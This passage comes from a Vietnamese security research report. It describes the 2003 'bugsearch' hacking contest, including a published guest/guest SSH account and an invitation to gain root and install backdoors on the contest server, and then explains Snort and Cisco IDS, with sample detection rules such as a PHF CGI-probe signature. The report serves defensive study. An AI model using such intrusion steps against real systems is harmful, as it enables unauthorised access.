2/ Các bạn cần cho biết địa chỉ Email để Ban tổ chức có thể gửi Email xác nhận kết quả của bạn và gửi thư mời bạn tới nhận giải. Địa chỉ Email có thể là phương thức duy nhất cho phép Ban tổ chức liên hệ tới các bạn nếu các bạn muốn, 3/ Các bạn có thể ủy quyền cho người khác nhận giải hoặc đề nghị phương án chuyển giải thưởng tới tay các bạn, Để tạo điều kiện cho nhiều người tham gia, chúng tôi sẽ gia hạn cuộc thi tới 18h00 ngày 22/10/2003. Chúc các bạn một cuộc thi hào hứng và thành công, Nhóm bugsearch “VỀ ĐÍCH” TÌM SƠ HỞ “BUGSEARCH” Thân chào các bạn, Chúng tôi đã nhận được một số emailcủa các bạn tham gia cuộc thi bugsearch thông báo về sơ hở dẫn đến cơ sở dữ liệu các tài khoản đăng ký trong bugsearch bị thay đổi. Danh sách các bạn tìm được sơ hở này là : Tên/nickname Email address Thời gian Quang Huy Date: Thu, 16 Oct 2003 00:21:46 -0700 (PDT) !!! Yeu Tram !!! Thu, 16 Oct 2003 01:48:37 -0700 (PDT) "::: PTV5 Website :::" Date: Thu, 16 Oct 2003 20:38:39 -0700 (PDT) Huynh Quoc Khanh" <huynh.quoc.khanh@quantic.com.vn > Date: Sat, 18 Oct 2003 10:13:56 +0700 Tuy đây chưa phải là trang chủ bị thay đổi, nhưng chúng tôi công nhận là các bạn đã có khả năng thay đổi một nội dung quan trọng của Website bugsearch và bạn Quang Huy là người đoạt giải thay đổi nội dung Website trị giá 1 (một) triệu đồng. Nhắc lại theo thể lệ Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 46 cuộc thi, nếu Quang Huy xâm nhập được sâu hơn vào hệ thống thì giải này sẽ dành cho người thứ hai và v.v. Để xem xét khả năng chống lại mất hòan tòan quyền kiểm soát máy bugsearch nếu hệ thống bị lộ mật khẩu của một tài khỏan, chúng tôi xin công bố một tài khỏan guest với password guest trên máy bugsearch. Các bạn có thể sử dụng tài khỏan này để kết nối vào bugsearch qua ssh và xem xét khả năng lấy root shell, cài Load Kernel Module, cài backdoor lên bugsearch. Thời gian không còn nhiều (cuộc thi được gia hạn tới 18h00 ngày 22/10/2003), hãy cố gắng “Về đích” trong cuộc thi bugsearch này. Chúc các bạn thành công, Nhóm bugsearch Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 47 Diễn biến của cuộc thi bugsearch lần tiếp theo như phản ánh thông qua 3 thông báo của bugsearch. • Ngày 26/9/2003 vào lúc 12h00, cuộc thi được nối lại. Máy bugsearch kết nối vào mạng • Ngày 13/10/2003, được biết một số bạn ngại lộ danh tánh nên chưa tích cực tham gia cuộc thi, chúng tôi đã thay đổi thể lệ nộp bài để cho phép các bạn có thể đang ký kết quả với nickname và email address. Trên thực tế, chúng tôi nhận thấy các bạn tham gia cuộc thi đã không ngần ngại thông báo kết quả cũng như danh tánh của mình khi tấn công thành công. Đồng thời cuộc thi được chính thức gia hạn thêm tới 22/10/2003. • Ngày 18/10/2003 vào lúc 16h00, nhóm đề tài quyết định “mạo hiểm” hơn bằng cách mở một tài khỏan guest với mật khẩu guest cho tất cả mọi người. Thông tin này được chúng tôi thông báo tới một số bạn cụ thể, thông tin trên các diễn đàn của hacker Việtnam, thông báo bởi echip. Việc mạo hiểm này là nhằm thử thách khả năng chống lại việc mất quyền root của bugsearch, trong trường hợp một dịch vụ với quyền hạn chế bị xâm nhập và hacker có được shell cùng quyền của người sử dụng hệ thống. • Tới đúng 18h00 nhóm dự án chấm dứt cuộc thi, cắt server ra khỏi mạng và tiến hành thống kê kết quả, tìm các backdoor có thể • Vào lúc 18h00 ngày 24/10/2003, trước sự chứng kiến của phóng viên tuần báo echip, nhóm dự án tiến hành niêm phong ổ đĩa cứng của bugsearch nhằm bảo đảm việc tìm kiếm các backdoor sau này, nếu có, tại hội thảo về bảo mật hệ thống. • Ngọai trừ giải đặc biệt cho người cài được backdoor mà quản trị mạng không biết chưa được xác định, hiện nay nhóm quản trị đã công nhận 1 giải thuộc về bạn Quang Huy (tự Huyremy), người đầu tiên trong 4 người đã phát hiện sơ hở của chương trình cập nhật danh sách người đăng ký vào web bugsearch và có khả năng thay đổi cơ sở dữ liệu người đang ký của bugsearch. Qua cuộc thi bugsearch chúng tôi rút ra những bài học kinh nghiệm sau: • Thi hacking là một hình thức tốt cho phép chúng ta đánh giá được trình độ, sở trường của các hacker tại một thời điểm. Ví dụ như tại thời điểm của cuộc thi, phần khai thác lỗi lập trình ứng dụng chạy trên server của các hacker là mạnh nhất. • Tổ chức cuộc thi là hình thức cho phép thử thách một cấu hình tốt nhất. Căn cứ trên những thành công xâm nhập cùng với các nhật ký của các hệ thống phát hiện xâm nhập (IDS), chúng ta có thể xác định được mức độ an tòan của một hệ thống nếu chúng ta triển khai. • IDS là một thành phần quan trọng của một hệ thống . Không có IDS khó mà có thể phát hiện sớm, lượng giá được mức độ “quan tâm” của cracker/hacker đối với hệ thống của chúng ta. Từ đó khó mà có được một quan tâm, đầu tư đúng với nhu cầu thực. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 48 • Kinh nghiệm cán bộ đối với việc phân tích các log của IDS là rất quan trọng. Các thông báo về tấn công của IDS nhiều khi không sát với thực tế. Ví dụ như các phêin làm việc nhằm thay đổi cơ sở dữ liệu của Web bugsearch được các hệ thống báo động ở cấp trung bình, thậm trí thấp. • Tổ chức thi hacking một cách bài bản với một web site hấp dẫn là một việc làm tốn kém và vượt quá khả năng của một đơn vị/công ty. Đó là những khó khăn về chuyên môn (phải có đủ chuyên gia ở các lĩnh vực mạng, hệ điều hành, cơ sở dữ liệu, lập trình, lập trình Internet …); khó khăn về tài chính (đường truyền riêng, thiết bị, chi phí giải thưởng..); khó khăn về nhân lực tổ chức theo dõi và khó khăn về thông tin. Do đó, nếu chúng ta muốn có những cuộc thi hacking trong tương lai thì đó phải là sự phối hợp của nhiều đơn vị, công ty và đặc biệt là các nhà cung cấp dịch vụ Internet chuyên nghiệp. Chúng tôi hy vọng rằng cuộc thi bugsearch chỉ là mở đầu cho những cuộc thi/nghiên cứu về bảo mật hệ thống sau này. Đó là một cách làm hiệu quả nhằm nâng cao khả năng bảo vệ của các mạng tin học của chúng ta. 4.6 Hệ thống phát hiện xâm nhập snort trên Linux 4.6.1 GIỚI THIỆU VỀ SNORT Snort là công cụ phát hiện xâm nhập khá phổ biến và được gọi là light-weight Instrution Detection System, với một số đặc tính sau: Hỗ trợ nhiều platform: Linux, OpenBSD, FreeBSD, Solaris, Windows,… I386 Sparc M68k/PPC Alpha Other X X X X X Linux X X X OpenBSD X X FreeBSD X X NetBSD X X Solaris X SunOS 4.1.X X HP-UX X AIX X IRIX X Tru64 X MacOS X Server X Win32 - (Win9x/NT/2000) - Kích thước tương nhỏ: phiên bản hiện tại 2.0.2 có kích thước 1885220 Bytes. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 49 - Có khả năng phát hiện một số lượng lớn các kiểu thăm dò, xâm nhập khác nhau như : buffer overflow, CGI-attack, dò tìm hệ điều hành, ICMP, virus,… - Phát hiện nhanh các xâm nhập theo thời gian thực. - Cung cấp cho nhà quản trị các thông tin cần thiết để xử lý các sự cố khi bị xâm nhập - Giúp người quản trị tự đặt ra các dấu hiệu xâm nhập mới một cách dễ dàng. - Là phần mềm Open Source và không tốn kém chi phí đầu tư. 4.6.2 CƠ SỞ THIẾT KẾ SNORT Snort được xây dựng với mục đích thoả mãn các tính năng cơ bản sau: Có hiệu năng cao, đơn giản và có tính uyển chuyển cao. Ba thành phần chính của Snort gồm có: hệ thống packet decoder, hệ thống detection engine và hệ thống logging & alerting. Ba thành phần này dựa trên cơ sở của thư viện LIBPCAP, là thư viện cung cấp khả năng lắng nghe và lọc packet trên mạng. Hệ thống Packet decoder: Nhiệm vụ chủ yếu của hệ thống này là phân tích gói dữ liệu thô bắt được trên mạng và phục hồi thành gói dữ liệu hoàn chỉnh ở lớp application, làm input cho hệ thống dectection engine. Quá trình phục hồi gói dữ liệu được tiến hành từ lớp datalink cho tới lớp application theo thứ tự của protocol stack. Vấn đề quan trọng đặt ra cho hệ thống này đó là tốc độ xử lý gói dữ liệu, nếu tốc độ xử lý chậm sẽ làm cho hiệu năng của SNORT giảm sút do “nghe sót”. Hệ thống detection engine SNORT dùng các rules để phát hiện ra các xâm nhập trên mạng. Xem rules sau: alert tcp !172.16.1.0/24 any -> any any (flags: SF; msg: “SYN-FIN Scan”;) Một rules có hai thành phần: Header và Option, Header: alert tcp !172.16.1.0/24 any -> any any Option: (flags: SF; msg: “SYN-FIN Scan”;) Mỗi dấu hiệu xâm nhập sẽ được thể hiện bằng một rule. Vậy SNORT quản lý tập các rules như thế nào ? SNORT dùng cấu trúc dữ liệu sau để quản lý các rules gọi là Chain Headers và Chain Options. Cấu trúc dữ liệu này bao gồm một dãy các Header và mỗi Header sẽ liên kết đến dãy các Option., sở dĩ dưa trên các Header là vì đây là Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 50 thành phần ít thay đổi của những rules được viết cho cùng một kiểu phát hiện xâm nhập và Option là thành phần dễ được sửa đổi nhất. Ví dụ ta có 40 rules được viết cho kiểu thăm dò CGI-BIN, thực chất các rules này có chung IP source, IP đích, port source, port đích, tức là có chung Header. Mỗi packet sẽ được so trùng lần lượt trong các dãy cho đến khi tìm thấy mẫu đầu tiên thì hành động tương ứng sẽ được thực hiện. Hệ thống Logging & alerting Dùng để thông báo cho quản trị mạng và ghi nhận lại các hành động xâm nhập hệ thống. Hiện tại có 3 dạng logging và 5 kiểu alerting. Các dạng logging, được chọn khi chạy SNORT - Dạng decoded: Đây là dạng log thô nhất, cho phép thực hiện nhanh và thích hợp với các chuyên gia - Dạng nhị phân tcpdump: theo dạng tương tự như tcpdump và ghi vào đĩa nhanh chóng, thích hợp với những hệ thống đòi hỏi performance cao. - Dạng cây thư mục IP: Sắp sếp hệ thống log theo cấu trúc cây thư mục IP, dễ hiểu đối với người dùng. Các dạng alerting: Chain Option Content TCP Flags ICMP Codes/types Payload Size Chain Option Content TCP Flags ICMP Codes/types Payload Size Chain Option Content TCP Flags ICMP Codes/types Payload Size Chain Option Content TCP Flags ICMP Codes/types Payload Size Chain Option Content TCP Flags ICMP Codes/types Payload Size Chain Header Source IP Address Destination IP Address Source Port Destination Port Chain Header Source IP Address Destination IP Address Source Port Destination Port Chain Header Source IP Address Destination IP Address Source Port Destination Port Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 51 - ghi alert vào syslog - ghi alert vào trong file text - gửi thông điệp Winpopup dùng chương trình smbclient - full alert: ghi lại thông điệp alert cùng với nội dung gói dữ liệu. - fast alert: chỉ ghi nhận lại header của gói dữ liệu.Cách này thường dùng trong các hệ thống cần performance cao. TẬP LUẬT(RULES) Tập luật của Snort đơn giản để ta hiểu và viết nhưng cũng đủ mạnh để có thể phát hiện tất cả các hành động xâm nhập trên mạng. Có 3 hành động chính được SNORT thực hiện khi so trùng 1 packet với các mẫu trong rules: - pass: loại bỏ packet mà SNORT bắt được - log: tuỳ theo dạng logging được chọn mà packet sẽ được ghi nhận theo dạng đó - alert: sinh ra một alert tùy theo dạng alert được chọn và log toàn bộ packet dùng dạng logging đã chọn. Dạng cơ bản nhất của một rule bao gồm protocol, chiều của gói dữ liệu và port cần quan tâm, không cần đến phần Option: log tcp any any -> 172.16.1.0/24 80 Rule này sẽ log tất cả các gói dữ liệu đi vào mạng 172.16.1.0/24 ở port 80 Một rule khác có chứa Option alert tcp any any -> 172.16.1.0/24 80 (content: "/cgi-bin/phf"; msg: "PHF probe!";) Rule này sẽ phát hiện các truy cập vào dịch vụ PHF trên web server và alert sẽ được tạo ra cùng với việc ghi nhận lại toàn bộ gói dữ liệu. Vùng địa chỉ IP trong các rules được viết dưới dạng CIDR block netmask, các port có thể được xác định riêng lẻ hoặc theo vùng, port bắt đầu và port kết thúc được ngăn cách bởi dấu “:” alert tcp any any -> 172.16.1.0/24 6000:6010 (msg: "X traffic";) Các option phổ biến của SNORT: 1. content: Search the packet payload for the a specified pattern. 2. flags: Test the TCP flags for specified settings. 3. ttl: Check the IP header's time-to-live (TTL) field. 4. itype: Match on the ICMP type field. 5. icode: Match on the ICMP code field. 6. minfrag: Set the threshold value for IP fragment size. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 52 7. id: Test the IP header for the specified value. 8. ack: Look for a specific TCP header acknowledgement number. 9. seq: Log for a specific TCP header sequence number. 10. logto: Log packets matching the rule to the specified filename. 11. dsize: Match on the size of the packet payload. 12. offset: Modifier for the content option, sets the offset into the packet payload to begin the content search. 13. depth: Modifier for the content option, sets the number of bytes from the start position to search through. 14. msg: Sets the message to be sent when a packet generates an event. THAM KHẢO SNORT có thể chạy tốt trên các platform mà LIBPCAP hổ trợ. Phiên bản mới nhật hiện nay: Snort 2.02 Các thông tin thêm về SNORT có thể tham khảo tại website: Mã nguồn SNORT có thể download tại: Maillink list: Thư viện libpcap: 4.6.3 KẾT QUẢ MÀ SNORT GHI NHẬN ĐƯỢC TRONG CUỘC THI BUGSEARCH Tổng số tấn công ghi nhận từ 54 địa chỉ IP khác nhau. Ghi nhận của snort ít hơn các hệ thống IDS là do triển khai snort bi trục trặc kỹ thuật và muộn hơn các IDS khác trong quá trình thi. Cài đặt phần mềm snort 2.02 trên RedHat Linux 7.1 và kết quả chi tiết mà snort ghi nhận được trình bày ở phụ lục D. 4.7 Triển khai thử nghiệm Cisco IDS cùng một số nhận định 4.7.1 Giới thiệu về Cisco IDS: IDS – Intrusion Detection System – là hệ thống phát hiện sự xâm nhập. IDS gồm có nhiều hệ thống khác nhau, cả hardware và software, chạy được trên các hệ điều hành khác nhau như Unix, Linux, Windows... Cisco IDS là một hệ thống IDS dựa trên nền network (chỉ có tác dụng đối với dữ liệu luân chuyển trên network) do Cisco phát triển. Nguyên lý hoạt động là so sánh dữ liệu thu nhận được với database của hệ thống để phát ra các cảnh báo về sự xâm nhập. Hệ thống bao gồm 2 phần: Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 53 - Sensor platform: là hardware dùng để theo dõi các packets truyền qua mạng theo thời gian thực - Director platform: là software dùng để config, log, và hiển thị các cảnh báo do sensor báo về. Khi phát hiện được sự xâm nhập, Cisco IDS có khả năng: - TCP reset: kill kết nối TCP hiện đang kết nối tới attacker bằng cách gởi TCP reset packet (chỉ có tác dụng với các kết nối TCP, còn UDP không ảnh hưởng) - IP blocking: IDS cập nhật Access Control List trên Router để từ chối tất cả các kết nối đến từ IP của attacker. - IP logging: lưu tất cả IP của attacker vào file log, đây là cách làm thụ động, không ngăn được hacker tiếp tục tấn công hệ thống. Cisco IDS là dòng sản phẩm dẫn đầu trên thị trường về giải pháp theo dõi bảo mật hệ thống. Đây là hệ thống được thiết kế để đáp ứng các yêu cầu ngày càng tăng của công tác bảo mật, bảo vệ hệ thống khỏi các cuộc tấn công từ chối dịch vụ (DoS), phát hiện sự xâm nhập hệ thống, chống lại sự tấn công của các loại sâu (như Code Red và Nimda), cũng như bảo vệ các doanh nghiệp có ứng dụng thương mại điện tử (e-commerce). Hệ thống Cisco IDS triển khai trong cuộc thi bugsearch là Cisco IDS 4210, có cấu hình: CPU Celeron 566MHz, 256MB Ram, OS Unix. Việc sử dụng hệ thống Cisco IDS có lợi hơn so với các hệ thống khác vì các lý do sau: - Database dùng để nhận dạng các cuộc tấn công thường xuyên được Cisco cập nhật - Sản phẩm có độ ổn định cao. - Dễ triển khai. Tuy nhiên, việc sử dụng Cisco IDS có bất lợi là giá thành cao, các phần mềm điều khiển đòi hỏi phải mua bản quyền. 4.7.2 Cách thức triển khai Cisco IDS trong cuộc thi bugsearch: IDS được đặt sau router 26xx, kết nối vào cùng hub với server đích. (theo như sơ đồ) IDS được cấu hình với dịch vụ lắng nghe các gói tin truyền đến IDS. Dùng phần mềm IDS Event Viewer để phân loại kết quả đạt được. Chi tiết việc cài đặt bằng lệnh gì, hình minh họa ta có thể xem ở đây: Tóm lại, việc cài đặt IDS có thể rút gọn theo các bước đơn giản như sau: Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 54 - Cấu hình IDS: nối monitor, keyboard, mouse vào Cisco IDS sensor để đặt IP cho IDS sensor. Sau đó ta có thể telnet đến IDS sensor thông qua interface int1 (dùng để command và control), hoặc ta có thể vào địa chỉ https://IDS_IP_add để config IDS sensor qua web - Nối IDS vào mạng: trên IDS có 2 interface RJ45: int0 dùng để quan sát tất cả dữ liệu được truyền qua mạng, int1 dùng để điều khiển và cấu hình IDS. Ta nối dây dẫn từ hub (nối đến máy chủ cần được bảo vệ) đến int0. Cần nhớ phải dùng hub để dữ liệu có thể truyền đến IDS sensor, không được dùng switch. Sau đó nối int1 đến máy ta dùng để điều khiển IDS sensor. - Theo dõi các cuộc tấn công: Cisco IDS được cung cấp kèm theo phần mềm Cis

Các file đính kèm theo tài liệu này:

  • pdfBáo cáo tổng quan đề tài hổ trợ bảo mật mạng tin học Việt Nam.pdf